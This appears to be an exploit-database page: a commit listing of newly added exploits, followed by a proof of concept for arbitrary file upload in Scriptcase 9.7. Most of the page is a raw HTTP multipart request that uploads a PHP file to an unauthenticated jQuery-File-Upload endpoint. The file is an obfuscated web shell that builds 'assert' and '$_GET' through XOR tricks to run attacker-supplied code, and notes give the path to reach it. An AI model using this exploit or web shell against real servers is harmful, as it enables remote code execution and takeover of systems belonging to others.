093714dc70
21 changes to exploits/shellcodes Microsoft Exchange Mailbox Assistants 15.0.847.40 - 'Service MSExchangeMailboxAssistants' Unquoted Service Path Microsoft Exchange Active Directory Topology 15.0.847.40 - 'Service MSExchangeADTopology' Unquoted Service Path 7-zip - Code Execution / Local Privilege Escalation PTPublisher v2.3.4 - Unquoted Service Path EaseUS Data Recovery - 'ensserver.exe' Unquoted Service Path Zyxel NWA-1100-NH - Command Injection ManageEngine ADSelfService Plus 6.1 - User Enumeration Verizon 4G LTE Network Extender - Weak Credentials Algorithm Delta Controls enteliTOUCH 3.40.3935 - Cross-Site Request Forgery (CSRF) Delta Controls enteliTOUCH 3.40.3935 - Cross-Site Scripting (XSS) Delta Controls enteliTOUCH 3.40.3935 - Cookie User Password Disclosure Scriptcase 9.7 - Remote Code Execution (RCE) WordPress Plugin Motopress Hotel Booking Lite 4.2.4 - SQL Injection Easy Appointments 1.4.2 - Information Disclosure WordPress Plugin Videos sync PDF 1.7.4 - Stored Cross Site Scripting (XSS) WordPress Plugin Popup Maker 1.16.5 - Stored Cross-Site Scripting (Authenticated) REDCap 11.3.9 - Stored Cross Site Scripting PKP Open Journals System 3.3 - Cross-Site Scripting (XSS) WordPress Plugin Elementor 3.6.2 - Remote Code Execution (RCE) (Authenticated) Fuel CMS 1.5.0 - Cross-Site Request Forgery (CSRF)
47 lines
No EOL
1.8 KiB
Text
47 lines
No EOL
1.8 KiB
Text
# Exploit Title: Scriptcasr 9.7 arbitrary file upload getshell
|
|
# Date: 2022-04-08
|
|
# Exploit Author: luckyt0mat0
|
|
# Vendor Homepage: https://www.scriptcase.net/
|
|
# Software Link: https://www.scriptcase.net/download/
|
|
# Version: 9.7
|
|
# Tested on: Windows Server 2019
|
|
|
|
# Proof of Concept:
|
|
|
|
POST /scriptcase/devel/lib/third/jquery_plugin/jQuery-File-Upload/server/php/ HTTP/1.1
|
|
Host: 10.50.1.214:8091
|
|
Content-Length: 570
|
|
Accept: application/json, text/javascript, */*; q=0.01
|
|
X-Requested-With: XMLHttpRequest
|
|
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
|
|
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary6gbgDzCQ2aZWm6iZ
|
|
Origin: http://10.50.1.214:8091
|
|
Referer: http://10.50.1.214:8091/scriptcase/devel/iface/app_template.php?randjs=MYxlp4xwCiIQBjy
|
|
Accept-Encoding: gzip, deflate
|
|
Accept-Language: zh-CN,zh;q=0.9
|
|
Cookie: sales1.scriptcase-_zldp=%2Blf8JBkbzCTGvnrypkRAEoy1%2BVW%2BpJL8Vv42yN%2FS02hog7eXhi2oz9sY2rJ5JXybCaUbPUvRWVc%3D; sales1.scriptcase-_zldt=6206f2cd-57fd-4e1d-99a8-b9a27c7b3421-2; PHPSESSID=be1281e8cde9348d284c3074c9bea53e; sc_actual_lang_samples=en_us
|
|
Connection: close
|
|
|
|
------WebKitFormBoundary6gbgDzCQ2aZWm6iZ
|
|
Content-Disposition: form-data; name="jqul_csrf_token"
|
|
|
|
gZiFUw6nNw84D4euS8RJ3AQLz0o3Bo1Q24Kq1ufcJA8FjRCIeohe0gBZ34hXIW7M
|
|
------WebKitFormBoundary6gbgDzCQ2aZWm6iZ
|
|
Content-Disposition: form-data; name="files[]"; filename="123.php"
|
|
Content-Type: text/html
|
|
|
|
<?php
|
|
error_reporting(0);
|
|
$a = rad2deg^(3).(2);
|
|
$b = asin^(2).(6);
|
|
$c = ceil^(1).(1);
|
|
$exp = $a.$b.$c; //assert
|
|
$pi=(is_nan^(6).(4)).(tan^(1).(5)); //_GET
|
|
$pi=$$pi; //$_GET
|
|
call_user_func($exp,$pi{0}($pi{1}));
|
|
?>
|
|
------WebKitFormBoundary6gbgDzCQ2aZWm6iZ———
|
|
|
|
# Notes:
|
|
- PHPSESSID is - be1281e8cde9348d284c3074c9bea53e
|
|
- Upload path is - http://x.x.x.:8091/scriptcase/tmp/sc_tmp_upload_{{PHPSESSID}}/123.php |